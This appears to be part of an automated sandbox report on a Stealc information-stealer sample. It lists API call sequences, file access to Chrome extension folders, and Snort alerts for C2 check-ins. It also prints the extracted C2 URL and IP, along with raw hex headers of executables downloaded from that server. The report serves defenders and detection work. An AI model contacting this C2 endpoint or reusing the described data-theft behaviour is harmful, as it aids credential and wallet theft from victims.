Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0005D1C0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_000515C0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0005B610
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0005DB60
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0005D540
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00062570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00062570
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000621F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_000621F0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00061650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00061650
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00061B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00061B80
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 89.105.198.253:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 89.105.198.253:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 89.105.198.253:80 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 89.105.198.253:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 89.105.198.253:80 -> 192.168.2.4:49730
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 89.105.198.253/300e6d86f44da037.php
Source: Malware configuration extractor URLs: http://89.105.198.253/300e6d86f44da037.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 22:31:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 12:30:30 GMTETag: "10e436-5e7ed3ec64580"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 22:31:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "a7550-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 22:32:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "94750-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 22:32:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "6dde8-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 22:32:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "1f3950-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 22:32:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "3ef50-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 